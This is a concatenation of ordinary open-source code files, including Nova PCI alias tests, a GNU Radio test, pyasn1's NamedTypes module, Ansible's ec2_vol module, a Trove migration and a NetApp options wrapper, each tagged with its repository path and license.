test_wrong_type_aliase(self): self.flags(pci_alias=[_fake_alias2]) self.assertRaises(exception.PciInvalidAlias, request._get_alias_from_config) def test_wrong_product_id_aliase(self): self.flags(pci_alias=[ """{ "name": "xxx", "capability_type": "pci", "product_id": "g111", "vendor_id": "1111", "device_type": "NIC" }"""]) self.assertRaises(exception.PciInvalidAlias, request._get_alias_from_config) def test_wrong_vendor_id_aliase(self): self.flags(pci_alias=[ """{ "name": "xxx", "capability_type": "pci", "product_id": "1111", "vendor_id": "0xg111", "device_type": "NIC" }"""]) self.assertRaises(exception.PciInvalidAlias, request._get_alias_from_config) def test_wrong_cap_type_aliase(self): self.flags(pci_alias=[ """{ "name": "xxx", "capability_type": "usb", "product_id": "1111", "vendor_id": "8086", "device_type": "NIC" }"""]) self.assertRaises(exception.PciInvalidAlias, request._get_alias_from_config) def test_dup_aliase(self): self.flags(pci_alias=[ """{ "name": "xxx", "capability_type": "pci", "product_id": "1111", "vendor_id": "8086", "device_type": "NIC" }""", """{ "name": "xxx", "capability_type": "pci", "product_id": "1111", "vendor_id": "8086", "device_type": "type-PCI" }"""]) self.assertRaises( exception.PciInvalidAlias, request._get_alias_from_config) def _verify_result(self, expected, real): exp_real = zip(expected, real) for exp, real in exp_real: self.assertEqual(exp['count'], real.count) 
self.assertEqual(exp['alias_name'], real.alias_name) self.assertEqual(exp['spec'], real.spec) def test_aliase_2_request(self): self.flags(pci_alias=[_fake_alias1, _fake_alias3]) expect_request = [ {'count': 3, 'spec': [{'vendor_id': '8086', 'product_id': '4443', 'dev_type': 'type-PCI', 'capability_type': 'pci'}], 'alias_name': 'QuicAssist'}, {'count': 1, 'spec': [{'vendor_id': '8086', 'product_id': '1111', 'dev_type': "type-PF", 'capability_type': 'pci'}], 'alias_name': 'IntelNIC'}, ] requests = request._translate_alias_to_requests( "QuicAssist : 3, IntelNIC: 1") self.assertEqual(set([p['count'] for p in requests]), set([1, 3])) self._verify_result(expect_request, requests) def test_aliase_2_request_invalid(self): self.flags(pci_alias=[_fake_alias1, _fake_alias3]) self.assertRaises(exception.PciRequestAliasNotDefined, request._translate_alias_to_requests, "QuicAssistX : 3") def test_get_pci_requests_from_flavor(self): self.flags(pci_alias=[_fake_alias1, _fake_alias3]) expect_request = [ {'count': 3, 'spec': [{'vendor_id': '8086', 'product_id': '4443', 'dev_type': "type-PCI", 'capability_type': 'pci'}], 'alias_name': 'QuicAssist'}, {'count': 1, 'spec': [{'vendor_id': '8086', 'product_id': '1111', 'dev_type': "type-PF", 'capability_type': 'pci'}], 'alias_name': 'IntelNIC'}, ] flavor = {'extra_specs': {"pci_passthrough:alias": "QuicAssist:3, IntelNIC: 1"}} requests = request.get_pci_requests_from_flavor(flavor) self.assertEqual(set([1, 3]), set([p.count for p in requests.requests])) self._verify_result(expect_request, requests.requests) def test_get_pci_requests_from_flavor_no_extra_spec(self): self.flags(pci_alias=[_fake_alias1, _fake_alias3]) flavor = {} requests = request.get_pci_requests_from_flavor(flavor) self.assertEqual([], requests.requests)
apache-2.0
hainn8x/gnuradio
gr-blocks/python/blocks/qa_multiply_matrix_ff.py
19
4796
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2014 Free Software Foundation, Inc. # # This file is part of GNU Radio # # GNU Radio is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3, or (at your option) # any later version. # # GNU Radio is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GNU Radio; see the file COPYING. If not, write to # the Free Software Foundation, Inc., 51 Franklin Street, # Boston, MA 02110-1301, USA. # import time import numpy import os import pmt from gnuradio import gr, gr_unittest from gnuradio import blocks class test_multiply_matrix_ff (gr_unittest.TestCase): def setUp (self): self.tb = gr.top_block () self.multiplier = None def tearDown (self): self.tb = None self.multiplier = None def run_once(self, X_in, A, tpp=gr.TPP_DONT, A2=None, tags=None, msg_A=None): """ Run the test for given input-, output- and matrix values. Every row from X_in is considered an input signal on a port. """ X_in = numpy.matrix(X_in) A_matrix = numpy.matrix(A) (N, M) = A_matrix.shape self.assertTrue(N == X_in.shape[0]) # Calc expected Y_out_exp = numpy.matrix(numpy.zeros((M, X_in.shape[1]))) self.multiplier = blocks.multiply_matrix_ff(A, tpp) if A2 is not None: self.multiplier.set_A(A2) A = A2 A_matrix = numpy.matrix(A) for i in xrange(N): if tags is None: these_tags = () else: these_tags = (tags[i],) self.tb.connect(blocks.vector_source_f(X_in[i].tolist()[0], tags=these_tags), (self.multiplier, i)) sinks = [] for i in xrange(M): sinks.append(blocks.vector_sink_f()) self.tb.connect((self.multiplier, i), sinks[i]) # Run and check self.tb.run() for i in xrange(X_in.shape[1]): Y_out_exp[:,i] = A_matrix * X_in[:,i] Y_out = [list(x.data()) for x in sinks] if tags is not None: self.the_tags = [] for i in xrange(M): self.the_tags.append(sinks[i].tags()) self.assertEqual(list(Y_out), Y_out_exp.tolist()) def test_001_t (self): """ Simplest possible check: N==M, unit matrix """ X_in = ( (1, 2, 3, 4), (5, 6, 7, 8), ) A = ( (1, 0), (0, 1), ) self.run_once(X_in, A) def test_002_t (self): """ Switch check: N==M, flipped unit matrix """ X_in = ( (1, 2, 3, 4), (5, 6, 7, 8), ) A = ( (0, 1), (1, 0), ) self.run_once(X_in, A) def test_003_t (self): """ Average """ X_in = ( (1, 1, 1, 1), (2, 2, 2, 2), ) A = ( (0.5, 0.5), (0.5, 0.5), ) self.run_once(X_in, A) def test_004_t (self): """ Set """ X_in = ( (1, 2, 3, 4), (5, 6, 7, 8), ) A1 = ( (1, 0), (0, 1), ) A2 = ( (0, 1), (1, 0), ) self.run_once(X_in, A1, A2=A2) def test_005_t (self): """ Tags """ X_in = ( (1, 2, 3, 4), (5, 6, 7, 8), ) A = ( (0, 1), # Flip them round (1, 0), ) tag1 = gr.tag_t() tag1.offset = 0 tag1.key = pmt.intern("in1") tag1.value = pmt.PMT_T tag2 = gr.tag_t() tag2.offset = 0 tag2.key = pmt.intern("in2") tag2.value = pmt.PMT_T self.run_once(X_in, A, tpp=999, tags=(tag1, tag2)) self.assertTrue(pmt.equal(tag1.key, self.the_tags[1][0].key)) self.assertTrue(pmt.equal(tag2.key, self.the_tags[0][0].key)) #def test_006_t (self): #""" Message passing """ #X_in = ( #(1, 2, 3, 4), #(5, 6, 7, 8), #) #A1 = ( #(1, 0), #(0, 1), #) #msg_A = ( #(0, 1), #(1, 0), #) #self.run_once(X_in, A1, msg_A=msg_A) if __name__ == '__main__': 
#gr_unittest.run(test_multiply_matrix_ff, "test_multiply_matrix_ff.xml") gr_unittest.run(test_multiply_matrix_ff)
gpl-3.0
uwosh/Campus_Directory_web_service
getAllSubjectsCX.py
1
1441
# getAllSubjectsCX import re import xmlrpclib import cx_Oracle Kim_Nguyen_G5 = '192.168.0.1' Kim_Nguyen_iMac = '192.168.0.1' Kim_Nguyen_MacBook = '192.168.0.1' Plone1 = '192.168.0.1' Plone3 = '192.168.0.1' def getAllSubjectsCX (self, usexml): request = self.REQUEST RESPONSE = request.RESPONSE remote_addr = request.REMOTE_ADDR if remote_addr in [Kim_Nguyen_iMac, Kim_Nguyen_MacBook, '127.0.0.1', Plone3 ]: file = open('/opt/Plone-2.5.5/zeocluster/client1/Extensions/Oracle_Database_Connection_NGUYEN_PRD.txt', 'r') for line in file.readlines(): if line <> "" and not line.startswith('#'): connString = line file.close() connection = cx_Oracle.connect(connString) cursor = connection.cursor() #cursor.execute("""select distinct(subject) from ps_class_tbl order by subject""") cursor.execute("""select distinct subject, descr from ps_subject_tbl s1 where s1.eff_status = 'A' and s1.effdt = (select max(s2.effdt) from ps_subject_tbl s2 where s1.subject = s2.subject and s2.eff_status = 'A' and s1.institution = s2.institution and s1.acad_org = s2.acad_org)""") retlist = [] for column_1, column_2 in cursor: retlist.append([column_1, column_2,]) if usexml == "0": return retlist else: myMarshaller = xmlrpclib.Marshaller() return myMarshaller.dumps(retlist)
gpl-2.0
crs4/ProMort
promort/utils/__init__.py
42
1098
# Copyright (c) 2019, CRS4 # # Permission is hereby granted, free of charge, to any person obtaining a copy of # this software and associated documentation files (the "Software"), to deal in # the Software without restriction, including without limitation the rights to # use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of # the Software, and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS # FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR # COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER # IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
mit
SecWiki/windows-kernel-exploits
MS14-068/pykek/pyasn1/type/namedtype.py
200
4794
# NamedType specification for constructed types
import sys
from pyasn1.type import tagmap
from pyasn1 import error

class NamedType:
    isOptional = 0
    isDefaulted = 0
    def __init__(self, name, t):
        self.__name = name; self.__type = t
    def __repr__(self): return '%s(%s, %s)' % (
        self.__class__.__name__, self.__name, self.__type
        )
    def getType(self): return self.__type
    def getName(self): return self.__name
    def __getitem__(self, idx):
        if idx == 0: return self.__name
        if idx == 1: return self.__type
        raise IndexError()

class OptionalNamedType(NamedType):
    isOptional = 1

class DefaultedNamedType(NamedType):
    isDefaulted = 1

class NamedTypes:
    def __init__(self, *namedTypes):
        self.__namedTypes = namedTypes
        self.__namedTypesLen = len(self.__namedTypes)
        self.__minTagSet = None
        self.__tagToPosIdx = {}; self.__nameToPosIdx = {}
        self.__tagMap = { False: None, True: None }
        self.__ambigiousTypes = {}

    def __repr__(self):
        r = '%s(' % self.__class__.__name__
        for n in self.__namedTypes:
            r = r + '%r, ' % (n,)
        return r + ')'

    def __getitem__(self, idx): return self.__namedTypes[idx]

    if sys.version_info[0] <= 2:
        def __nonzero__(self): return bool(self.__namedTypesLen)
    else:
        def __bool__(self): return bool(self.__namedTypesLen)
    def __len__(self): return self.__namedTypesLen

    def getTypeByPosition(self, idx):
        if idx < 0 or idx >= self.__namedTypesLen:
            raise error.PyAsn1Error('Type position out of range')
        else:
            return self.__namedTypes[idx].getType()

    def getPositionByType(self, tagSet):
        if not self.__tagToPosIdx:
            idx = self.__namedTypesLen
            while idx > 0:
                idx = idx - 1
                tagMap = self.__namedTypes[idx].getType().getTagMap()
                for t in tagMap.getPosMap():
                    if t in self.__tagToPosIdx:
                        raise error.PyAsn1Error('Duplicate type %s' % (t,))
                    self.__tagToPosIdx[t] = idx
        try:
            return self.__tagToPosIdx[tagSet]
        except KeyError:
            raise error.PyAsn1Error('Type %s not found' % (tagSet,))

    def getNameByPosition(self, idx):
        try:
            return self.__namedTypes[idx].getName()
        except IndexError:
            raise error.PyAsn1Error('Type position out of range')

    def getPositionByName(self, name):
        if not self.__nameToPosIdx:
            idx = self.__namedTypesLen
            while idx > 0:
                idx = idx - 1
                n = self.__namedTypes[idx].getName()
                if n in self.__nameToPosIdx:
                    raise error.PyAsn1Error('Duplicate name %s' % (n,))
                self.__nameToPosIdx[n] = idx
        try:
            return self.__nameToPosIdx[name]
        except KeyError:
            raise error.PyAsn1Error('Name %s not found' % (name,))

    def __buildAmbigiousTagMap(self):
        ambigiousTypes = ()
        idx = self.__namedTypesLen
        while idx > 0:
            idx = idx - 1
            t = self.__namedTypes[idx]
            if t.isOptional or t.isDefaulted:
                ambigiousTypes = (t, ) + ambigiousTypes
            else:
                ambigiousTypes = (t, )
            self.__ambigiousTypes[idx] = NamedTypes(*ambigiousTypes)

    def getTagMapNearPosition(self, idx):
        if not self.__ambigiousTypes: self.__buildAmbigiousTagMap()
        try:
            return self.__ambigiousTypes[idx].getTagMap()
        except KeyError:
            raise error.PyAsn1Error('Type position out of range')

    def getPositionNearType(self, tagSet, idx):
        if not self.__ambigiousTypes: self.__buildAmbigiousTagMap()
        try:
            return idx+self.__ambigiousTypes[idx].getPositionByType(tagSet)
        except KeyError:
            raise error.PyAsn1Error('Type position out of range')

    def genMinTagSet(self):
        if self.__minTagSet is None:
            for t in self.__namedTypes:
                __type = t.getType()
                tagSet = getattr(__type, 'getMinTagSet', __type.getTagSet)()
                if self.__minTagSet is None or tagSet < self.__minTagSet:
                    self.__minTagSet = tagSet
        return self.__minTagSet

    def getTagMap(self, uniq=False):
        if self.__tagMap[uniq] is None:
            tagMap = tagmap.TagMap()
            for nt in self.__namedTypes:
                tagMap = tagMap.clone(
                    nt.getType(), nt.getType().getTagMap(), uniq
                    )
            self.__tagMap[uniq] = tagMap
        return self.__tagMap[uniq]
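The NamedTypes machinery above is what pyasn1's constructed types (SEQUENCE, SET, CHOICE) consume through their componentType specification. A minimal usage sketch, assuming the usual pyasn1 univ and namedtype modules; the Record type and its field names are made up for illustration:

from pyasn1.type import univ, namedtype

# A SEQUENCE whose component list is described with the classes defined above:
# a mandatory INTEGER, an optional OCTET STRING and a defaulted INTEGER.
class Record(univ.Sequence):
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('id', univ.Integer()),
        namedtype.OptionalNamedType('note', univ.OctetString()),
        namedtype.DefaultedNamedType('version', univ.Integer(1))
    )

record = Record()
record.setComponentByName('id', 42)

# getPositionByName()/getNameByPosition() are the lookups the codecs rely on.
assert Record.componentType.getPositionByName('note') == 1
assert Record.componentType.getNameByPosition(0) == 'id'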
mit
cooniur/ansible-modules-core
cloud/amazon/ec2_vol.py
11
19254
#!/usr/bin/python # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. DOCUMENTATION = ''' --- module: ec2_vol short_description: create and attach a volume, return volume id and device map description: - creates an EBS volume and optionally attaches it to an instance. If both an instance ID and a device name is given and the instance has a device at the device name, then no volume is created and no attachment is made. This module has a dependency on python-boto. version_added: "1.1" options: instance: description: - instance ID if you wish to attach the volume. Since 1.9 you can set to None to detach. required: false default: null name: description: - volume Name tag if you wish to attach an existing volume (requires instance) required: false default: null version_added: "1.6" id: description: - volume id if you wish to attach an existing volume (requires instance) or remove an existing volume required: false default: null version_added: "1.6" volume_size: description: - size of volume (in GB) to create. required: false default: null volume_type: description: - Type of EBS volume; standard (magnetic), gp2 (SSD), io1 (Provisioned IOPS). "Standard" is the old EBS default and continues to remain the Ansible default for backwards compatibility. required: false default: standard version_added: "1.9" iops: description: - the provisioned IOPs you want to associate with this volume (integer). required: false default: 100 version_added: "1.3" encrypted: description: - Enable encryption at rest for this volume. default: false version_added: "1.8" device_name: description: - device id to override device mapping. Assumes /dev/sdf for Linux/UNIX and /dev/xvdf for Windows. required: false default: null delete_on_termination: description: - When set to "yes", the volume will be deleted upon instance termination. required: false default: "no" choices: ["yes", "no"] version_added: "2.1" zone: description: - zone in which to create the volume, if unset uses the zone the instance is in (if set) required: false default: null aliases: ['aws_zone', 'ec2_zone'] snapshot: description: - snapshot ID on which to base the volume required: false default: null version_added: "1.5" validate_certs: description: - When set to "no", SSL certificates will not be validated for boto versions >= 2.6.0. required: false default: "yes" choices: ["yes", "no"] version_added: "1.5" state: description: - whether to ensure the volume is present or absent, or to list existing volumes (The C(list) option was added in version 1.8). 
required: false default: present choices: ['absent', 'present', 'list'] version_added: "1.6" author: "Lester Wade (@lwade)" extends_documentation_fragment: - aws - ec2 ''' EXAMPLES = ''' # Simple attachment action - ec2_vol: instance: XXXXXX volume_size: 5 device_name: sdd # Example using custom iops params - ec2_vol: instance: XXXXXX volume_size: 5 iops: 100 device_name: sdd # Example using snapshot id - ec2_vol: instance: XXXXXX snapshot: "{{ snapshot }}" # Playbook example combined with instance launch - ec2: keypair: "{{ keypair }}" image: "{{ image }}" wait: yes count: 3 register: ec2 - ec2_vol: instance: "{{ item.id }} " volume_size: 5 with_items: "{{ ec2.instances }}" register: ec2_vol # Example: Launch an instance and then add a volume if not already attached # * Volume will be created with the given name if not already created. # * Nothing will happen if the volume is already attached. # * Requires Ansible 2.0 - ec2: keypair: "{{ keypair }}" image: "{{ image }}" zone: YYYYYY id: my_instance wait: yes count: 1 register: ec2 - ec2_vol: instance: "{{ item.id }}" name: my_existing_volume_Name_tag device_name: /dev/xvdf with_items: "{{ ec2.instances }}" register: ec2_vol # Remove a volume - ec2_vol: id: vol-XXXXXXXX state: absent # Detach a volume (since 1.9) - ec2_vol: id: vol-XXXXXXXX instance: None # List volumes for an instance - ec2_vol: instance: i-XXXXXX state: list # Create new volume using SSD storage - ec2_vol: instance: XXXXXX volume_size: 50 volume_type: gp2 device_name: /dev/xvdf # Attach an existing volume to instance. The volume will be deleted upon instance termination. - ec2_vol: instance: XXXXXX id: XXXXXX device_name: /dev/sdf delete_on_termination: yes ''' RETURN = ''' device: description: device name of attached volume returned: when success type: string sample: "/def/sdf" volume_id: description: the id of volume returned: when success type: string sample: "vol-35b333d9" volume_type: description: the volume type returned: when success type: string sample: "standard" volume: description: a dictionary containing detailed attributes of the volume returned: when success type: string sample: { "attachment_set": { "attach_time": "2015-10-23T00:22:29.000Z", "deleteOnTermination": "false", "device": "/dev/sdf", "instance_id": "i-8356263c", "status": "attached" }, "create_time": "2015-10-21T14:36:08.870Z", "encrypted": false, "id": "vol-35b333d9", "iops": null, "size": 1, "snapshot_id": "", "status": "in-use", "tags": { "env": "dev" }, "type": "standard", "zone": "us-east-1b" } ''' import time from distutils.version import LooseVersion try: import boto.ec2 from boto.exception import BotoServerError from boto.ec2.blockdevicemapping import BlockDeviceType, BlockDeviceMapping HAS_BOTO = True except ImportError: HAS_BOTO = False def get_volume(module, ec2): name = module.params.get('name') id = module.params.get('id') zone = module.params.get('zone') filters = {} volume_ids = None # If no name or id supplied, just try volume creation based on module parameters if id is None and name is None: return None if zone: filters['availability_zone'] = zone if name: filters = {'tag:Name': name} if id: volume_ids = [id] try: vols = ec2.get_all_volumes(volume_ids=volume_ids, filters=filters) except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) if not vols: if id: msg = "Could not find the volume with id: %s" % id if name: msg += (" and name: %s" % name) module.fail_json(msg=msg) else: return None if len(vols) > 1: 
module.fail_json(msg="Found more than one volume in zone (if specified) with name: %s" % name) return vols[0] def get_volumes(module, ec2): instance = module.params.get('instance') try: if not instance: vols = ec2.get_all_volumes() else: vols = ec2.get_all_volumes(filters={'attachment.instance-id': instance}) except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) return vols def delete_volume(module, ec2): volume_id = module.params['id'] try: ec2.delete_volume(volume_id) module.exit_json(changed=True) except boto.exception.EC2ResponseError as ec2_error: if ec2_error.code == 'InvalidVolume.NotFound': module.exit_json(changed=False) module.fail_json(msg=ec2_error.message) def boto_supports_volume_encryption(): """ Check if Boto library supports encryption of EBS volumes (added in 2.29.0) Returns: True if boto library has the named param as an argument on the request_spot_instances method, else False """ return hasattr(boto, 'Version') and LooseVersion(boto.Version) >= LooseVersion('2.29.0') def create_volume(module, ec2, zone): changed = False name = module.params.get('name') iops = module.params.get('iops') encrypted = module.params.get('encrypted') volume_size = module.params.get('volume_size') volume_type = module.params.get('volume_type') snapshot = module.params.get('snapshot') # If custom iops is defined we use volume_type "io1" rather than the default of "standard" if iops: volume_type = 'io1' volume = get_volume(module, ec2) if volume is None: try: if boto_supports_volume_encryption(): volume = ec2.create_volume(volume_size, zone, snapshot, volume_type, iops, encrypted) changed = True else: volume = ec2.create_volume(volume_size, zone, snapshot, volume_type, iops) changed = True while volume.status != 'available': time.sleep(3) volume.update() if name: ec2.create_tags([volume.id], {"Name": name}) except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) return volume, changed def attach_volume(module, ec2, volume, instance): device_name = module.params.get('device_name') delete_on_termination = module.params.get('delete_on_termination') changed = False # If device_name isn't set, make a choice based on best practices here: # http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/block-device-mapping-concepts.html # In future this needs to be more dynamic but combining block device mapping best practices # (bounds for devices, as above) with instance.block_device_mapping data would be tricky. 
For me ;) # Use password data attribute to tell whether the instance is Windows or Linux if device_name is None: try: if not ec2.get_password_data(instance.id): device_name = '/dev/sdf' else: device_name = '/dev/xvdf' except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) if volume.attachment_state() is not None: adata = volume.attach_data if adata.instance_id != instance.id: module.fail_json(msg = "Volume %s is already attached to another instance: %s" % (volume.id, adata.instance_id)) else: # Volume is already attached to right instance changed = modify_dot_attribute(module, ec2, instance, device_name) else: try: volume.attach(instance.id, device_name) while volume.attachment_state() != 'attached': time.sleep(3) volume.update() changed = True except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) modify_dot_attribute(module, ec2, instance, device_name) return volume, changed def modify_dot_attribute(module, ec2, instance, device_name): """ Modify delete_on_termination attribute """ delete_on_termination = module.params.get('delete_on_termination') changed = False try: instance.update() dot = instance.block_device_mapping[device_name].delete_on_termination except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) if delete_on_termination != dot: try: bdt = BlockDeviceType(delete_on_termination=delete_on_termination) bdm = BlockDeviceMapping() bdm[device_name] = bdt ec2.modify_instance_attribute(instance_id=instance.id, attribute='blockDeviceMapping', value=bdm) while instance.block_device_mapping[device_name].delete_on_termination != delete_on_termination: time.sleep(3) instance.update() changed = True except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) return changed def detach_volume(module, ec2, volume): changed = False if volume.attachment_state() is not None: adata = volume.attach_data volume.detach() while volume.attachment_state() is not None: time.sleep(3) volume.update() changed = True return volume, changed def get_volume_info(volume, state): # If we're just listing volumes then do nothing, else get the latest update for the volume if state != 'list': volume.update() volume_info = {} attachment = volume.attach_data volume_info = { 'create_time': volume.create_time, 'encrypted': volume.encrypted, 'id': volume.id, 'iops': volume.iops, 'size': volume.size, 'snapshot_id': volume.snapshot_id, 'status': volume.status, 'type': volume.type, 'zone': volume.zone, 'attachment_set': { 'attach_time': attachment.attach_time, 'device': attachment.device, 'instance_id': attachment.instance_id, 'status': attachment.status }, 'tags': volume.tags } if hasattr(attachment, 'deleteOnTermination'): volume_info['attachment_set']['deleteOnTermination'] = attachment.deleteOnTermination return volume_info def main(): argument_spec = ec2_argument_spec() argument_spec.update(dict( instance = dict(), id = dict(), name = dict(), volume_size = dict(), volume_type = dict(choices=['standard', 'gp2', 'io1'], default='standard'), iops = dict(), encrypted = dict(type='bool', default=False), device_name = dict(), delete_on_termination = dict(type='bool', default=False), zone = dict(aliases=['availability_zone', 'aws_zone', 'ec2_zone']), snapshot = dict(), state = dict(choices=['absent', 'present', 'list'], default='present') ) ) module = AnsibleModule(argument_spec=argument_spec) if not HAS_BOTO: 
module.fail_json(msg='boto required for this module') id = module.params.get('id') name = module.params.get('name') instance = module.params.get('instance') volume_size = module.params.get('volume_size') encrypted = module.params.get('encrypted') device_name = module.params.get('device_name') zone = module.params.get('zone') snapshot = module.params.get('snapshot') state = module.params.get('state') # Ensure we have the zone or can get the zone if instance is None and zone is None and state == 'present': module.fail_json(msg="You must specify either instance or zone") # Set volume detach flag if instance == 'None' or instance == '': instance = None detach_vol_flag = True else: detach_vol_flag = False # Set changed flag changed = False region, ec2_url, aws_connect_params = get_aws_connection_info(module) if region: try: ec2 = connect_to_aws(boto.ec2, region, **aws_connect_params) except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e: module.fail_json(msg=str(e)) else: module.fail_json(msg="region must be specified") if state == 'list': returned_volumes = [] vols = get_volumes(module, ec2) for v in vols: attachment = v.attach_data returned_volumes.append(get_volume_info(v, state)) module.exit_json(changed=False, volumes=returned_volumes) if encrypted and not boto_supports_volume_encryption(): module.fail_json(msg="You must use boto >= v2.29.0 to use encrypted volumes") # Here we need to get the zone info for the instance. This covers situation where # instance is specified but zone isn't. # Useful for playbooks chaining instance launch with volume create + attach and where the # zone doesn't matter to the user. inst = None if instance: try: reservation = ec2.get_all_instances(instance_ids=instance) except BotoServerError as e: module.fail_json(msg=e.message) inst = reservation[0].instances[0] zone = inst.placement # Check if there is a volume already mounted there. if device_name: if device_name in inst.block_device_mapping: module.exit_json(msg="Volume mapping for %s already exists on instance %s" % (device_name, instance), volume_id=inst.block_device_mapping[device_name].volume_id, device=device_name, changed=False) # Delaying the checks until after the instance check allows us to get volume ids for existing volumes # without needing to pass an unused volume_size if not volume_size and not (id or name or snapshot): module.fail_json(msg="You must specify volume_size or identify an existing volume by id, name, or snapshot") if volume_size and (id or snapshot): module.fail_json(msg="Cannot specify volume_size together with id or snapshot") if state == 'present': volume, changed = create_volume(module, ec2, zone) if detach_vol_flag: volume, changed = detach_volume(module, ec2, volume) elif inst is not None: volume, changed = attach_volume(module, ec2, volume, inst) # Add device, volume_id and volume_type parameters separately to maintain backward compatability volume_info = get_volume_info(volume, state) module.exit_json(changed=changed, volume=volume_info, device=volume_info['attachment_set']['device'], volume_id=volume_info['id'], volume_type=volume_info['type']) elif state == 'absent': delete_volume(module, ec2) # import module snippets from ansible.module_utils.basic import * from ansible.module_utils.ec2 import * if __name__ == '__main__': main()
gpl-3.0
hplustree/trove
trove/db/sqlalchemy/migrate_repo/versions/025_add_service_statuses_indexes.py
4
1221
# Copyright 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from oslo_log import log as logging
from sqlalchemy.exc import OperationalError
from sqlalchemy.schema import Index
from sqlalchemy.schema import MetaData

from trove.db.sqlalchemy.migrate_repo.schema import Table


logger = logging.getLogger('trove.db.sqlalchemy.migrate_repo.schema')


def upgrade(migrate_engine):
    meta = MetaData()
    meta.bind = migrate_engine

    service_statuses = Table('service_statuses', meta, autoload=True)
    idx = Index("service_statuses_instance_id",
                service_statuses.c.instance_id)

    try:
        idx.create()
    except OperationalError as e:
        logger.info(e)
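This migration only defines the upgrade step and tolerates the index already existing. A downgrade is not part of the original script; if one were written under the same sqlalchemy-migrate conventions, a plausible sketch would simply drop the index:

def downgrade(migrate_engine):
    # Hypothetical counterpart to upgrade(); not present in the original
    # migration script.
    meta = MetaData()
    meta.bind = migrate_engine

    service_statuses = Table('service_statuses', meta, autoload=True)
    idx = Index("service_statuses_instance_id",
                service_statuses.c.instance_id)
    try:
        idx.drop()
    except OperationalError as e:
        logger.info(e)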
apache-2.0
dockerera/func
func/minion/modules/netapp/options.py
5
1483
##
## NetApp Filer 'options' Module
##
## Copyright 2008, Red Hat, Inc
## John Eckersberg <[email protected]>
##
## This software may be freely redistributed under the terms of the GNU
## general public license.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
##

from func.minion.modules import func_module
from func.minion.modules.netapp.common import *

class Options(func_module.FuncModule):

    # Update these if need be.
    version = "0.0.1"
    api_version = "0.0.1"
    description = "Interface to the 'options' command"

    def get(self, filer, filter=''):
        """
        TODO: Document me ...
        """
        cmd_opts = ['options', filter]
        output = ssh(filer, cmd_opts)
        if 'No such option' in output:
            return output.strip()

        result = {}
        for line in output.split('\n'):
            if not line:
                continue
            tokens = line.split()
            try:
                result[tokens[0]] = tokens[1]
            except:
                result[tokens[0]] = ''
        return result

    def set(self, filer, option, value):
        """
        TODO: Document me ...
        """
        cmd_opts = ['options', option, value]
        output = ssh(filer, cmd_opts)
        # should return no output (maybe a space or newline)
        return check_output("^\s*$", output)
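Options.get() boils down to splitting each line of the filer's 'options' output into an option name and a possibly empty value. A self-contained sketch of that parsing, using a made-up output sample rather than a live filer:

# Hypothetical 'options' output; real filers print one option per line.
sample_output = """autosupport.enable  on
autosupport.to
cifs.enable         off"""

result = {}
for line in sample_output.split('\n'):
    if not line:
        continue
    tokens = line.split()
    try:
        result[tokens[0]] = tokens[1]
    except IndexError:
        # Option present but with no value, e.g. 'autosupport.to' above
        result[tokens[0]] = ''

assert result['autosupport.enable'] == 'on'
assert result['autosupport.to'] == ''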
gpl-2.0
ivanalejandro0/bitmask_client
src/leap/bitmask/logs/streamtologger.py
8
2008
# -*- coding: utf-8 -*-
# streamtologger.py
# Copyright (C) 2013 LEAP
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
"""
Stream object that redirects writes to a logger instance.
"""
